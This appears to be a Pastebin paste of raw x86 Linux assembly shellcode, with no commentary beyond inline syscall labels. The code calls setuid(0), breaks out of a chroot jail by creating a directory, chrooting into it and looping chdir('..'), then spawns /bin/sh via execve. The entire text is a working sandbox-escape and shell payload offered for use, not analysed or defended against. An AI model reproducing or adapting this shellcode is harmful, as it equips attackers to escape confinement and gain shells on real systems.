Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- global _start
- _start:
- xor eax, eax
- xor ebx, ebx
- xor ecx, ecx
- xor edx, edx
- mov al, 213 ;// Syscall for SETUID
- ;// EBX is 0 for setuid(0)
- int 80h
- xor eax, eax
- mov al, 39 ;// Syscall for MKDIR
- push ecx ;// push 0x000000 for null terminator
- push 0x74756f2e ;// ".out" in reverse
- mov ebx, esp ;// pointer to ".out" folder string
- mov cx, 755o ;// rwxr-xr-x
- int 80h
- xor eax, eax
- xor ecx, ecx ;// O_RDONLY (000000000)
- mov al, 0x2e ;// Open "." string
- push eax ;// Push "\x00\x00\x00." onto stack
- mov ebx, esp ;// Set EBX to the string pointer
- mov al, 5 ;// Syscall for open
- int 80h
- mov esi, eax ;// Move File Descriptor into ESI for later
- xor eax, eax
- push ecx ;// push 0x000000 for null terminator
- push 0x74756f2e ;// ".out" in reverse
- mov ebx, esp ;// pointer to ".out" folder string
- mov al, 61 ;// Syscall for CHROOT
- int 80h
- xor eax, eax
- mov ebx, esi ;// move ".out" FD into EBX
- mov al, 133 ;// Syscall for FCHDIR
- int 80h
- xor eax, eax
- mov al, 6 ;// Syscall for CLOSE
- mov ebx, esi
- int 80h
- xor eax, eax
- mov ax, 0x2e2e ;// move ".." to stack
- push eax
- mov ebx, esp
- mov cx, 1000 ;// loop 1000 times
- loop1: xor eax, eax
- mov al, 12 ;// Syscall for CHDIR
- int 80h
- dec ecx
- jnz loop1
- mov cl, 0x2e ;// Set ECX to "."
- push ecx ;// Push "." onto stack
- mov ebx, esp ;// Pointer to ".out" folder string
- mov al, 61 ;// Syscall for CHROOT
- int 80h
- xor eax, eax
- push eax
- push 0x68732f6e
- push 0x69622f2f
- mov ebx, esp
- push eax
- mov edx, esp
- push ebx
- mov ecx, esp
- mov al, 11 ;// Syscall for EXECVE
- int 80h
- xor eax, eax
- xor ebx, ebx
- mov al, 1
- int 80h
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
